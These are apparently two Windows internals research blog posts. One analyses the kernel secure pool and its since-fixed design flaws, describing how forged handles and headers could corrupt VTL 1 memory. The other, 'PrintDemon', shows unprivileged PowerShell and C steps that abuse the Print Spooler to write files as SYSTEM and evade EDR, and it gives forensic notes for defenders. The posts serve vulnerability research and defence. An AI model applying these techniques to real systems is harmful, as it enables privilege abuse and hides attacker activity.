An interesting variable to look at here is SkmiSecurePoolStart, that gets a value of <SecurePoolBaseInKernel> - <SecurePoolBaseInSecureKernel>. Since the normal kernel and secure kernel have separate address spaces, the secure pool will be mapped in different addresses in each (as we’ve seen, it has a fixed address in the secure kernel and an ASLRed address in the normal kernel). This variable will allow SecureKernel to receive secure pool addresses from the normal kernel and translate them to secure kernel addresses, an ability that is necessary since this pool is meant to be used by the normal kernel and 3rd-party drivers.

After SkmmInitializeSecurePool returns there is another call to SkInitializeSecurePool, which calls SecurePoolMgrInitialize. This function initializes a pool state structure that we chose to call SK_POOL_STATE in the global variable SecurePoolGlobalState.

struct _SK_POOL_STATE
{

    LIST_ENTRY PoolLinks;
    PVOID Lock;
    RTLP_HP_HEAP_MANAGER HeapManager;
    PSEGMENT_HEAP SegmentHeap;
SK_POOL_STATE, *PSK_POOL_STATE;

Then it starts the heap manager and initializes a bitmap that will be used to mark allocated addresses in the secure pool. Finally, SecurePoolMgrInitialize calls RtlpHpHeapCreate to allocate a heap and create a SEGMENT_HEAP for the secure pool.

The first design flaw in the original implementation is actually related to the SEGMENT_HEAP allocation. This is a subtle point unless someone has pre-read our 70 page book : due to how “metadata” allocations work, the SEGMENT_HEAP ended up being allocated as part of the secure pool, which, as per what we explained here and the Microsoft blog, means that it also ended up mapped in the VTL 0 region that encompasses the secure pool.

Since SEGMENT_HEAP contains pointers to certain functions owned by the heap manager (which, in the secure pool case, is hosted in Securekernel.exe), this resulted in an information leak vulnerability that could lead to the discovery of the VTL 1 base address of SecureKernel.exe (which is ASLRed).

This has now been fixed by no longer mapping the SEGMENT_HEAP structure in the VTL 0 region.

Creation & Destruction

Unlike the normal kernel pool, memory cannot be allocated from the secure pool directly as this would defeat the whole purpose. To get access to the secure pool, a driver first needs to call a new function – ExCreatePool. This function receives Flags, Tag, Params and an output parameter Handle. The function first validates the arguments:

  • Flags must be equal to 3
  • Tag cannot be 0
  • Params must be 0
  • Handle cannot be NULL

After the arguments have been validates, the function makes a secure call to service SECURESERVICE_SECURE_POOL_CREATE, sending in the tag as the only parameter. This will reach the SkSpCreateSecurePool function in Securekernel. This function calls SkobCreateObject to allocate a secure object of type SkSpStateType, and then forwards the allocated structure together with the received Tag to SecurePoolInit, which will populate it. We chose to call this structure SK_POOL, and it contains the following fields:

struct _SK_POOL
{

    LIST_ENTRY PoolLinks;
    PSEGMENT_HEAP SegmentHeap;
    LONG64 PoolAllocs;
    ULONG64 Tag;
    PRTL_CSPARSE_BITMAP AllocBitmapTracker;
} SK_POOL, *PSK_POOL;

It then initializes Tag to the tag supplied by the caller, and SegmentHeap and AllocBitmapTracker to the heap and bitmap that were initialized at boot and is pointed to by SecurePoolGlobalState.SegmentHeap and a global variable SecurePoolBitmapData. This structure is added to a linked list stored in SecurePoolGlobalState, which we called PoolLinks, and will contain the number of allocations done from it (PoolAllocs is initially set to zero).

Finally, the function calls SkobCreateHandle to create a handle which will be returned to the caller. Now the caller can access the secure pool using this handle.

When the driver no longer needs access to the pool (usually right before unloading), it needs to call ExDestroyPool with the handle it received. This will reach SecurePoolDestroy which checks that this entry contains no allocations (PoolAllocs = 0) and wasn’t modified (PoolEntry.SegmentHeap == SecurePoolGlobalState.SegmentHeap). If the validation was successful, the entry is removed from the list and the structure is freed. From that point the handle is no longer valid and cannot be used.

The second design bug identified in the original build was around what the Handle value contained. In the original design, Handle was an obfuscated value created through the XORing of certain virtual addresses, which was then validated (as you’ll see in the Allocation section below) to point to a SK_POOL structure with the right fields filled out. However, due to the fact that the Secure Kernel does not use ASLR, the values part of the XOR computation were known to VTL 0 attackers.

Therefore, due to the fact that the contents of an SK_POOL can be inferred and built correctly (for the same reason), a VTL 0 attacker could first create a secure pool allocation that corresponds to a fake SK_POOL, compute the address of this allocation in the VTL 1 address range (since, as explained here and in Microsoft’s blog post, there is a known delta), and then use the known XOR computation to supply this as a fake Handle to future Allocation, Update, Deallocation, and Destroy calls.

Among other things, this would allow an attacker to control operations such as the PoolAllocs counter shown earlier, which is incremented/decremented at various times, which would then corrupt an adjacent VTL 1 allocation or address (since only the first 16 bytes of SK_POOL are validated).

The fix, which is the new design shown here, leverages the Secure Kernel’s Object Manager to allocate and define a real object, then to create a real secure handle associated with it. Secure objects/handles cannot be faked, other than stealing someone else’s handle, but this results in VTL 0 data corruption, not VTL 1 arbitrary writes.

Allocation

After getting access to the secure pool, the driver can allocate memory through another new exported kernel function – ExAllocatePool3. Officially, this function is documented. But it is documented in such a useless way that it would almost be better if it wasn’t documented at all:

The ExAllocatePool3  routine allocates pool memory of the specified type and returns a pointer to the allocated block. This routine is similar to ExAllocatePool2 but it adds extended parameters.

This tells us basically nothing. But the POOL_EXTENDED_PARAMETER is found in Wdm.h together with the rest of the information we need, so we can get a bit of information from that:

typedef enum POOL_EXTENDED_PARAMETER_TYPE {
    PoolExtendedParameterInvalidType = 0,
    PoolExtendedParameterPriority,
    PoolExtendedParameterSecurePool,
    PoolExtendedParameterMax
POOL_EXTENDED_PARAMETER_TYPE, *PPOOL_EXTENDED_PARAMETER_TYPE;

#define POOL_EXTENDED_PARAMETER_TYPE_BITS    8
#define POOL_EXTENDED_PARAMETER_REQUIRED_FIELD_BITS    1

#define POOL_EXTENDED_PARAMETER_RESERVED_BITS    (64 - POOL_EXTENDED_PARAMETER_TYPE_BITS - POOL_EXTENDED_PARAMETER_REQUIRED_FIELD_BITS)

#define SECURE_POOL_FLAGS_NONE       0x0
#define SECURE_POOL_FLAGS_FREEABLE   0x1

#define SECURE_POOL_FLAGS_MODIFIABLE 0x2

typedef struct _POOL_EXTENDED_PARAMS_SECURE_POOL {
    HANDLE SecurePoolHandle;
    PVOID Buffer;
    ULONG_PTR Cookie;
    ULONG SecurePoolFlags;
POOL_EXTENDED_PARAMS_SECURE_POOL;

typedef struct _POOL_EXTENDED_PARAMETER {
    struct {
        ULONG64 Type : POOL_EXTENDED_PARAMETER_TYPE_BITS;
        ULONG64 Optional : POOL_EXTENDED_PARAMETER_REQUIRED_FIELD_BITS;
        ULONG64 Reserved : POOL_EXTENDED_PARAMETER_RESERVED_BITS;
    } DUMMYSTRUCTNAME;
    union {
        ULONG64 Reserved2;
        PVOID Reserved3;
        EX_POOL_PRIORITY Priority;
        POOL_EXTENDED_PARAMS_SECURE_POOL* SecurePoolParams;
    } DUMMYUNIONNAME;
POOL_EXTENDED_PARAMETER, *PPOOL_EXTENDED_PARAMETER;

typedef CONST POOL_EXTENDED_PARAMETER *PCPOOL_EXTENDED_PARAMETER;

First, when we look at the POOL_EXTENDED_PARAMETER_TYPE enum, we can see 2 options – PoolExtendedParametersPriority and PoolExtendedParametersSecurePool. The official documentation has no mention of secure pool anywhere or which parameters it receives and how. By reading it, you’d think ExAllocatePool3 is just ExAllocatePool2 with an additional “priority” parameter.

So back to ExAllocatePool3 – it takes in the same POOL_FLAGS parameter, but also two new ones  – ExtendedParameters and ExtendedParametersCount:

DECLSPEC_RESTRICT
PVOID

ExAllocatePool3 (

    _In_ POOL_FLAGS Flags,
    _In_ SIZE_T NumberOfBytes,
    _In_ ULONG Tag,
    _In_ PCPOOL_EXTENDED_PARAMETER ExtendedParameters,
    _In_ ULONG ExtendedParametersCount
);

ExtendedParameters has a Type member, which is one of the values in the POOL_EXTENDED_PARAMETERS_TYPE enum. This is the first thing that ExAllocatePool3 looks at:

If the parameter type is 1 (PoolExtendedParameterPriority), the function reads the Priority field and later calls ExAllocatePoolWithTagPriority. If the type is 2 (PoolExtendedParameterSecurePool) the function reads the POOL_EXTENDED_PARAMS_SECURE_POOL structure from ExtendedParameters. Later the information from this structure is passed into ExpSecurePoolAllocate:

Another interesting thing to notice is that for secure pool allocations, ExtendedParameterCount must be one (meaning no other extended parameters are allowed other than the ones related to secure pool) and flags must be POOL_FLAG_NON_PAGED. We already know that secure pool only initializes one heap, which is NonPaged, so this requirement makes sense.

ExAllocatePool3 reads from ExtendedParameters a handle, buffer, cookie and flags and passes them to ExpSecurePoolAllocate together with the tag and number of bytes for this allocation. Let’s go over each of these new arguments:

  • SecurePoolHandle is the handle received from ExCreatePool
  • Buffer is a memory buffer containing the data to be written into this allocation. Since this is a secure pool that is not writable to drivers running in the normal kernel, SecureKernel must write the data into the allocation. The flags will determine whether this data can be modified later.
  • Flags – The options for flags, as we saw in wdm.h, are SECURE_POOL_FLAGS_MODIFIABLE and SECURE_POOL_FLAGS_FREEABLE. As the names suggest, these determine whether the content of the allocation can be updated after it’s been created and whether this allocation can be freed.
  • Cookie is chosen by the caller and will be used to encode the signature in the header of the new entry, together with the tag.

SkSecurePoolAllocate forwards the parameters to SecurePoolAllocate, which calls SecurePoolAllocateInternal. This function calls RtlpHpAllocateHeap to allocate heap memory in the secure pool, but adds 0x10 bytes to the size requested by the user:

This is done because the first 0x10 bytes of this allocation will be used for a secure pool header:

struct _SK_SECURE_POOL_HEADER
{

    ULONG_PTR Signature;
    ULONG Flags;
    ULONG Reserved;
SK_SECURE_POOL_HEADER, *PSK_SECURE_POOL_HEADER;

This header contains the Flags sent by the caller (specifying whether this allocation can be modified or freed) and a signature made up of the cookie, XORed with the tag and the handle for the pool. This header will be used by SecureKernel and is not known to the caller, which will receive a pointer to the data, that is being written immediately after this header (so the user receives a pointer to <allocation start>+0x10).

Before initializing the secure pool header, there is a call to SecurePoolAllocTrackerIsAlloc to validate that the header is inside the secure pool range and not inside an already allocated block. This check doesn’t make much sense here, since the header is not a user-supplied address but one that was just allocated by the function itself, but is probably the result of some extra paranoid checks (or an inline macro) that were added as a result of the second design flaw we’ll explain shortly.

Then there is a call to SecurePoolAllocTrackerSetBit, to set the bit in the bitmap to mark this address as allocated, and only then the header is populated. If the allocation was successful, SkPool->PoolAllocs is incremented by 1.

When this address is eventually returned to SkSecurePoolAllocate, it is adjusted to a normal kernel address with SkmiSecurePoolStart and returned to the normal kernel:

Then the driver which requested the allocation can use the returned address to read it. But since this pool is protected from being written to by the normal kernel, if the driver wants to make any changes to the content, assuming that it created a modifiable allocation to begin with, it has to use another new API added for this purpose – ExSecurePoolUpdate.

Going back to the bitmap — why is it necessary to track the allocation? This takes us to the third and final design flaw, which is that a secure pool header could easily be faked, since the information stored in Signature is known — the Cookie is caller-supplied, the Tag is as well, and the SecurePoolHandle too. In fact, in combination with the first flaw this is even worse, as the allocation can then be made to point to a fake SK_POOL.

The idea behind this attack would be to first perform a legitimate allocation of, say, 0x40 bytes. Next, manufacture a fake SK_SECURE_POOL_HEADER at the beginning of the allocation. Finally, pass the address, plus 0x10 (the size of a header) to the Update or Free functions we’ll show next. Now, these functions will use the fake header we’ve just constructed, which among things can be made to point to a fake SK_POOL, on top of causing issues such as pool shape manipulation, double-frees, and more.

By using a bitmap to track legitimate vs. non-legitimate allocations, fake pool headers immediately lead to a crash.

Updating Secure Pool Allocation

When a driver wants to update the contents of an allocation done in the secure pool, it has to call ExSecurePoolUpdate with the following arguments:

  • SecurePoolHandle – the driver’s handle to the secure pool
  • The Tag that was used for the allocation that should be modified
  • Address of the allocation to be modified
  • Cookie that was used when allocating this memory
  • Offset inside the allocation
  • Size of data to be written
  • Pointer to a buffer containing the new data to write into this allocation

Of course, as you’re about to see, the allocation must have been marked as updateable in the first place.

These arguments are sent to secure kernel through a secure call, where they reach SkSecurePoolUpdate. This function passes the arguments to SecurePoolUpdate, with the allocation address adjusted to point to the correct secure kernel address.

SecurePoolUpdate first validates the pool handle by XORing it with the Signature field of the SEGMENT_HEAP and making sure the result is the address of the SEGMENT_HEAP itself and then forwards the arguments to SecurePoolUpdateInternal. First this function calls SecurePoolAllocTrackerIsAlloc to check the secure pool bitmap and make sure the supplied address is allocated. Then it does some more internal validations of the allocation by calling SecurePoolValidate – an internal function which validates the input arguments by making sure that the signature field for the allocation matches Cookie ^ SecurePoolHandle ^ Tag:

This check is meant to make sure that the driver that is trying to modify the allocation is the one that made it, since no other driver should have the right cookie and tag that were used when allocating it.

Then SecurePoolUpdateInternal makes a few more checks:

  • Flags field of the header has to have the SECURE_POOL_FLAGS_MODIFIABLE bit set. If this flag was not set when allocating this block, the memory cannot be modified.
  • Size cannot be zero
  • Offset cannot be bigger than the size of the allocation
  • Offset + Size cannot be larger than the size of the allocation (since that would create an overflow that would write over the next allocation)

If any of these checks fail, the function would bugcheck with code 0x13A (KERNEL_MODE_HEAP_CORRUPTION).

Only if all the validations pass, the function will write the data in the supplied buffer into the allocation, with the requested offset and size.

Freeing Secure Pool Allocation

The last thing a driver can do with a pool allocation is free it, through ExFreePool2. This function, like ExAllocatePool2/3 receives ExtendedParameters and ExtendedParametersCount. If ExtendedParametersCount is zero, The function will call ExFreeHeapPool to free an allocation done in the normal kernel pool. Otherwise the only valid value for the ExtendedParameters Type field is PoolExtendedParametersSecurePool (2). If the type is correct, the function will read the secure pool parameters and validate that the Flags field is zero and that other fields are not empty. Then the requested address and tag are sent through a secure call, together with the Cookie and SecurePoolHandle that were read from ExtendedParameters:

The secure kernel functions SecurePoolFree and SecurePoolFreeInternal validate the supplied address, pool handle and the header of the pool allocation that the caller wants to free, and also make sure it was allocated with the SECURE_POOL_FLAGS_FREEABLE flag. If all validations pass, the memory inside the allocation is zeroed and the allocation is freed through RtlpHpFreeHeap. Then the PoolAllocs field in the SK_POOL structure belonging to this handle is decreased and there is another check to see that the value is not below zero.

Code Sample

We wrote a simple example for allocating, modifying and freeing secure pool memory:

#include <wdm.h>

DRIVER_INITIALIZEDriverEntry;
DRIVER_UNLOAD DriverUnload;

HANDLE g_SecurePoolHandle;
PVOID g_Allocation;

VOID
DriverUnload (
    _In_ PDRIVER_OBJECT DriverObject
    )
{
    POOL_EXTENDED_PARAMETER extendedParams[1] = { 0 };
    POOL_EXTENDED_PARAMS_SECURE_POOL securePoolParams = { 0 };
    UNREFERENCED_PARAMETER(DriverObject);

    if (g_SecurePoolHandle != nullptr)
    {
        if (g_Allocation != nullptr)
        {
            extendedParams[0].Type = PoolExtendedParameterSecurePool;
            extendedParams[0].SecurePoolParams = &securePoolParams;
            securePoolParams.Cookie = 0x1234;
            securePoolParams.Buffer = nullptr;
            securePoolParams.SecurePoolFlags = 0;
            securePoolParams.SecurePoolHandle = g_SecurePoolHandle;
            ExFreePool2(g_Allocation, 'mySP', extendedParams, RTL_NUMBER_OF(extendedParams));
        }
        ExDestroyPool(g_SecurePoolHandle);
    }
    return;
}

NTSTATUS
DriverEntry (
    __In__PDRIVER_OBJECT DriverObject,
    __In_ PUNICODE_STRING RegistryPath
    )
{
    NTSTATUS status;
    POOL_EXTENDED_PARAMETER extendedParams[1] = { 0 };
    POOL_EXTENDED_PARAMS_SECURE_POOL securePoolParams = { 0 };
    ULONG64 buffer = 0x41414141;
    ULONG64 updateBuffer = 0x42424242;
     UNREFERENCED_PARAMETER(RegistryPath);

    DriverObject->DriverUnload = DriverUnload;

    //
    // Create a secure pool handle
    //
    status = ExCreatePool(POOL_CREATE_FLG_SECURE_POOL |
                           POOL_CREATE_FLG_USE_GLOBAL_POOL,

                         'mySP',
                          NULL,
                          &g_SecurePoolHandle);
    if (!NT_SUCCESS(status))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID,
                    DPFLTR_ERROR_LEVEL,

                   "Failed creating secure pool with status %lx\n",
                   status);
        goto Exit;
    }
    DbgPrintEx(DPFLTR_IHVDRIVER_ID,
               DPFLTR_ERROR_LEVEL,

               "Pool: 0x%p\n",
               g_SecurePoolHandle);

    //
    // Make an allocation in the secure pool
    //
    extendedParams[0].Type = PoolExtendedParameterSecurePool;
    extendedParams[0].SecurePoolParams = &securePoolParams;
    securePoolParams.Cookie = 0x1234;
    securePoolParams.SecurePoolFlags = SECURE_POOL_FLAGS_FREEABLE | SECURE_POOL_FLAGS_MODIFIABLE;
    securePoolParams.SecurePoolHandle = g_SecurePoolHandle;
    securePoolParams.Buffer = &buffer;
    g_Allocation = ExAllocatePool3(POOL_FLAG_NON_PAGED,
                                    sizeof(buffer),
                                   'mySP',
                                   extendedParams,
                                   RTL_NUMBER_OF(extendedParams));
    if (g_Allocation == nullptr)
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID,
DPFLTR_ERROR_LEVEL.

                   "Failed allocating memory in secure pool\n");
        status = STATUS_UNSUCCESSFUL;
        goto Exit;
    }

    DbgPrintEx(DPFLTR_IHVDRIVER_ID,
                DPFLTR_ERROR_LEVEL,

               "Allocated: 0x%p\n",
               g_Allocation);

    //
    // Update the allocation
    //
    status = ExSecurePoolUpdate(g_SecurePoolHandle,
                                'mySP',
                                g_Allocation,
                                securePoolParams.Cookie,
                                0,
                                sizeof(updateBuffer),
                                &updateBuffer);
    if (!NT_SUCCESS(status))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID,
                  DPFLTR_ERROR_LEVEL,
                   "Failed updating allocation with status %lx\n",
                   status);
        goto Exit;
    }

    DbgPrintEx(DPFLTR_IHVDRIVER_ID,
               DPFLTR_ERROR_LEVEL,
               "Successfully updated allocation\n");

    status = STATUS_SUCCESS;

Exit:
    return status;
}

Conclusion

The secure pool can be a powerful feature to help drivers protect sensitive information from other code running in kernel mode. It allows us to store memory in a way that can’t be modified, and possibly not even freed, by anyone, including the driver that allocated the memory! It has the new benefit of allowing any kernel code to make use of some of the benefits of VTL 1 protection, not limiting them to Windows code only.

Like any new feature, this implementation is not perfect and might still have issues, but this is definitely a new and exciting addition that is worth keeping an eye on in upcoming Windows releases.

 

Read our other blog posts:

PrintDemon: Print Spooler Privilege Escalation, Persistence & Stealth (CVE-2020-1048 & more)

We promised you there would be a Part 1 to FaxHell, and with today’s Patch Tuesday and CVE-2020-1048, we can finally talk about some of the very exciting technical details of the Windows Print Spooler, and interesting ways it can be used to elevate privileges, bypass EDR rules, gain persistence, and more. Ironically, the Print Spooler continues to be one of the oldest Windows components that still hasn’t gotten much scrutiny, even though it’s largely unchanged since Windows NT 4, and was even famously abused by Stuxnet (using some similar APIs we’ll be looking at!). It’s extra ironic that an underground ‘zine first looked at the Print Spooler, which was never found by Microsoft, and that’s what the team behind Stuxnet ended up using!

First, we’d like to shout out to Peleg Hadar and Tomer Bar from SafeBreach Labs who earned the MSRC acknowledgment for one of the CVEs we’ll describe — there are a few others that both the team and ourselves have found, which may be patched in future releases, so there’s definitely still some dragons hiding. We understand that Peleg and Tomer will be presenting their research at Blackhat USA 2020, which should be an exciting addition to this post.

Secondly, Alex would like to apologize for the naming/branding of a CVE — we did not originally anticipate a patch for this issue to have collided with other research, and we thought that since the Spooler is a service, or a daemon in Unix terms, and given the existence of FaxHell, the name PrintDemon would be appropriate.

Printers, Drivers, Ports, & Jobs

While we typically like to go into the deep, gory, guts of Windows components (it’s an internals blog, after all!), we felt it would be worth keeping things simple, just to emphasize the criticality of these issues in terms of how easy they are to abuse/exploit — while also obviously providing valuable tips for defenders in terms of protecting themselves.

So, to begin with, let’s look at a very simple description of how the printing process works, extremely dumbed down. We won’t talk about monitors or providors (sp) or processors, but rather just the basic printing pipeline.

To begin with, a printer must be associated with a minimum of two elements:

  • A printer port — you’d normally think of this as LPT1 back in the day, or a USB port today, or even a TCP/IP port (and address)
    • Some of you probably know that it can also “FILE:” which means the printer can print to a file (PORTPROMPT: on Windows 8 and above)
  • A printer driver — this used to be a kernel-mode component, but with the new “V4” model, this is all done in user mode for more than a decade now

Because the Spooler service, implemented in Spoolsv.exe, runs with SYSTEM privileges, and is network accessible, these two elements have drawn people to perform all sorts of interesting attacks, such as trying to

  • Printing to a file in a privilege location, hoping Spooler will do that
  • Loading a “printer driver” that’s actually malicious
  • Dropping files remotely using Spooler RPC APIs
  • Injecting “printer drivers” from remote systems
  • Abusing file parsing bugs in EMF/XPS spooler files to gain code execution

Most of which have resulted in actual bugs found, and some hardening done by Microsoft. That being said, there remain a number of logical issues, that one could call downright design flaws which lead to some interesting behavior.

Back to our topic: to make things work, we must first load a printer driver. You’d naturally expect that this requires privileges, and some MSDN pages still suggest the SeLoadDriverPrivilege is required. However, starting in Vista, to make things easier for Standard User accounts, and due to the fact these now run in user-mode, the reality is more complicated. As long as the driver is a pre-existing, inbox driver, no privileges are needed — whatsoever — to install a print driver.

So let’s install the simplest driver there is: the Generic / Text-Only driver. Open up a PowerShell window (as a standard user, if you’d like), and write:

> Add-PrinterDriver -Name "Generic / Text Only"

Now you can enumerate the installed drivers:

> Get-PrinterDriver

Name                                PrinterEnvironment MajorVersion    Manufacturer
----                                ------------------ ------------    ------------
Microsoft XPS Document Writer v4    Windows x64        4               Microsoft
Microsoft Print To PDF              Windows x64        4               Microsoft
Microsoft Shared Fax Driver         Windows x64        3               Microsoft
Generic / Text Only                 Windows x64        3               Generic

If you’d like to do this in plain old C, it couldn’t be easier:

hr = InstallPrinterDriverFromPackage(NULL, NULL, L"Generic / Text Only", NULL, 0);

Our next required step is to have a port that we can associate with our new printer. Here’s an interesting, not well documented twist, however: a port can be a file — and that’s not the same thing as “printing to a file”. It’s a file port, which is an entirely different concept. And adding one is just as easy as yet another line of PowerShell (we used a world writeable directory as our example):

> Add-PrinterPort -Name "C:\windows\tracing\myport.txt"

Let’s see the fruits of our labour:

> Get-PrinterPort | ft Name

Name
----
C:\windows\tracing\myport.txt
COM1:
COM2:
COM3:
COM4:
FILE:
LPT1:
LPT2:
LPT3:
PORTPROMPT:
SHRFAX:

To do this in C, you have two choices. First, you can prompt the user to input the port name, by using the AddPortW API. You don’t actually need to have your own GUI — you can pass NULL as the hWnd parameter — but you also have no control and will block until the user creates the port. The UI will look like this:

Another choice is to manually replicate what the dialog does, which is to use the XcvData API. Adding a port is as easy as:

PWCHAR g_PortName = L"c:\\windows\\tracing\\myport.txt";
dwNeeded = ((DWORD)wcslen(g_PortName) + 1) * sizeof(WCHAR);
XcvData(hMonitor,
        L"AddPort",
        (LPBYTE)g_PortName,
        dwNeeded,
        NULL,
        0,
        &dwNeeded,
        &dwStatus);

The more complicated part is getting that hMonitor — which requires a bit of arcane knowledge:

PRINTER_DEFAULTS printerDefaults;
printerDefaults.pDatatype = NULL;
printerDefaults.pDevMode = NULL;
printerDefaults.DesiredAccess = SERVER_ACCESS_ADMINISTER;
OpenPrinter(L",XcvMonitor Local Port", &hMonitor, &printerDefaults);

You might see ADMINISTER in there and go a-ha — that needs Adminstrator privileges. But in fact, it does not: anyone can add a port. What you’ll note though, is that passing in a path you don’t have access to will result in an “Access Denied” error. More on this later.

Don’t forget to be a good citizen and call ClosePrinter(hMonitor) when you’re done!

We have a port, we have a printer driver. That is all we need to create a printer and bind it to these two elements. And again, this does not require a privileged user, and is yet another single line of PowerShell:

> Add-Printer -Name "PrintDemon" -DriverName "Generic / Text Only" -PortName "c:\windows\tracing\myport.txt"

Which you can now check with:

> Get-Printer | ft Name, DriverName, PortName

Name DriverName PortName
---- ---------- --------
PrintDemon Generic / Text Only C:\windows\tracing\myport.txt

The C code is equally simple:

PRINTER_INFO_2 printerInfo = { 0 };
printerInfo.pPortName = L"c:\\windows\\tracing\\myport.txt";
printerInfo.pDriverName = L"Generic / Text Only";
printerInfo.pPrinterName = L"PrintDemon";
printerInfo.pPrintProcessor = L"WinPrint";
printerInfo.pDatatype = L"RAW";
hPrinter = AddPrinter(NULL, 2, (LPBYTE)&printerInfo);

Now you have a printer handle, and we can see what this is good for. Alternatively, you can use OpenPrinter once you know the printer exists, which only needs the printer name.

What can we do next? Well the last step is to actually print something. PowerShell delivers another simple command to do this:

> "Hello, Printer!" | Out-Printer -Name "PrintDemon"

If you take a look at the file contents, however, you’ll notice something “odd”:

0D 0A 0A 0A 0A 0A 0A 20 20 20 20 20 20 20 20 20
20 48 65 6C 6C 6F 2C 20 50 72 69 6E 74 65 72 21
0D 0A …

Opening this in Notepad might give you a better visual indication of what’s going on — PowerShell thinks this is an actual printer. So it’s respecting the margins of the Letter (or A4) format, adding a few new lines for the top margin, and then spacing out your string for the left margin. Cute.

Bear in mind, this is behavior that in C, you can configure — but typically Win32 applications will print this way, since they think this is a real printer.

Speaking about C, how can you achieve the same effect? Well, here, we actually have two choices — but we’ll cover the simpler and more commonly taken approach, which is to use the GDI API, which will internally create a print job to handle our payload.

DOC_INFO_1 docInfo;
docInfo.pDatatype = L"RAW";
docInfo.pOutputFile = NULL;
docInfo.pDocName = L"Document";
StartDocPrinter(hPrinter, 1, (LPBYTE)&docInfo);

PCHAR printerData = "Hello, printer!\n";
dwNeeded = (DWORD)strlen(printerData);
WritePrinter(hPrinter, printerData, dwNeeded, &dwNeeded);

EndDocPrinter(hPrinter);

And, voila, the file contents now simply store our string.

To conclude this overview, we’ve seen how with a simple set of unprivileged PowerShell commands, or equivalent lines of C, we can essentially write data on the file system by pretending it’s a printer. Let’s take a look at what happens behind the scenes in Process Monitor.

Spooling as Evasion

Let’s take a look at all of the operations that occurred when we ran these commands. We’ll skip the driver “installation” as that’s just a mess of PnP and Windows Servicing Stack, and begin with adding the port:

Here we have our first EDR / DFIR evidence trail : it turns out that printer ports are nothing more than registry values under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports. Obviously, only privileged users can write to this registry key, but the Spooler service does it for us over RPC, as you can see in the stack trace below:

Next, let’s see how the printer creation looks like:

Again, we see that the operations are mostly registry based. Here’s how a printer looks like — note the Port value, for example, which is showing our file path.

Now let’s look at what that PowerShell command did when printing out our document. Here’s a full view of the relevant file system activity (the registry is no longer really involved), with some interesting parts marked out:

Whoa — what’s going on here? First, let’s go a bit deeper in the world of printing. As long as spooling is enabled, data printed doesn’t directly go to the printer. Instead, the job is spooled, which essentially will result in the creation of a spool file. By default, this will live in the c:\windows\system32\spool\PRINTERS directory, but that is actually customizable on a per-system as well as per-printer basis (that’s a thread worth digging into later).

Again, also by default, this file name will either be FPnnnnn.SPL for EMF print operations, or simply nnnnn.SPL for RAW print operations. The SPL file is nothing more than a copy, essentially, of all the data that is meant to go the printer. In other words, it briefly contained the “Hello, printer!” string.

A more interesting file is the shadow job file. This file is needed because print jobs aren’t necessarily instant. They can error out, be scheduled, be paused, either manually or due to issues with the printer. During this time, information about the job itself must remain in more than just Spoolsv.exe’s memory, especially since it is often prone to crashing due to 3rd party printer driver bugs — and due to the fact that print jobs survive reboots. Below, you can see the Spooler writing out this file, whose data structure has changed over the years, but has now reached the SHADOWFILE_4 data structure that is documented on our GitHub repository.

We’ll talk about some interesting things you can do with the shadow job file later in the persistence section.

Next, we have the actual creation of the file that is serving as our port. Unfortunately, Process Monitor always shows the primary token, so if you double-click on the event, you’ll see this operation is actually done under impersonation:

This is may actually seem like a key security feature of the Spooler service — without it, you could create a printer port to any privileged location on the disk, and have the Spooler “print” to it, essentially achieving an arbitrary file system read/write primitive. However, as we’ll describe later, the situation is a bit more complicated. It may also seem like from an EDR perspective, you still have some idea as to who the user is. But, stay tuned.

Finally, once the write is done, both the spool file and the shadow job file are deleted (by default), which is seen as those SetDisposition calls:

So far, what we’ve shown is that we can write anywhere on disk — presumably to locations that we have access to — under the guise of the Spooler service. Additionally, we’ve shown that the file creation is done under impersonation, which should reveal the original user behind the operation. Investigating the job itself will also show the user name and machine name. So far, forensically, it seems like as long as this information can be gathered, it’s hard to hide…

We will break both of those assumptions soon, but first, let’s take a look at an interesting way that this behavior can be used.

Spooling as IPC

The first interesting use of the Spooler, and most benign, is to leverage it for communication between processes, across users, and even across reboots (and potentially networks). You can essentially treat a printer as a securable object (technically, a printer job is too, but that’s not officially exposed) and issue both read and write operations in it, through two mechanisms:

  • Using the GDI API, and issuing ReadPrinter and WritePrinter commands.
    • First, you must have issued a StartDocPrinter and EndDocPrinter pair of calls (in between the write) to create the printer job and spool data in it.
    • The trick is to use SetJob to make the job enter a paused state from the beginning (JOB_CONTROL_PAUSE), so the spool file remains persistent
    • The former API will return a print job ID, that the client side can then use as part of a call to OpenPrinter with the special syntax of adding the suffix ,Job n to the printer name, which opens a print job instead of a printer.
      • Clients can use the EnumJobs API to enumerate all the printer jobs and find the one they want to read from based on some properties.
  • Using the raw print job API, and using WriteFile after obtaining a handle to the spool file.
    • Once the writes are complete, call ScheduleJob to officially make it visible.
    • Client continues to use ReadPrinter like in the other option

You might wonder what advantages any of this has versus just using regular File I/O. We’ve thought of a few:

  • If going with the full GDI approach, you’re not importing any obvious I/O APIs
  • The read and writes, when done by ReadPrinter and WritePrinter are not done impersonated. This means that they appear as if coming from SYSTEM running inside Spoolsv.exe
    • This also potentially means you can read and write from a spooler file in a location where you’d normally not have access to.
  • It’s doubtful any security products, until just about now, have ever investigated or looked at spooler files
    • And, with the right API/registry changes, you can actually move the spooler directory somewhere else for your printer
  • By cancelling the job, you get immediate deletion of the data, again, from a service context
  • By resuming the job, you essentially achieve a file copy — albeit this one does happen impersonated, as we’ve learnt so far

We’ve published on our GitHub repository a simple printclient and printserver application, which implement client/server mechanism for communicating between two processes by leveraging these ideas.

Let’s see what happens when we run the server:

As expected, we now have a spool file created, and we can see the print queue below showing our job — which is highly visible and traceable, if you know to look.

On the client side, let’s run the binary and look at the result:

The information you see at the top comes from the printer API — using EnumJob and GetJob to retrieve the information that we want. Additionally, however, we went a step deeper, as we wanted to look at the information stored in the shadow job itself. We noted some interesting discrepancies:

  • Even though MSDN claims otherwise, and the API will always return NULL, print jobs to indeed have security descriptors
    • Trying to zero them out in the shadow job made the Spooler unable to ever resume/write the data!
  • Some data is represented differently
    • For example, the Status field in the shadow job has different semantics, and contains internal statuses that are not exposed through the API
    • Or, the StartTime and UntilTime, which are 0 in the API, are actually 60 in the shadow job

We wanted to better understand how and when the shadow job data is read, and when is internal state in the Spooler used instead — just like the Service Control Manager both has its own in-memory database of services, but also backs it all up in the registry, we thought the Spooler must work in a similar way.

Spooler Forensics

Eventually, thanks to the fact that the Spooler is written in C++ (which has rich type information due to mangled function names) we understood that the Spooler keeps track of jobs in INIJOB data structures.

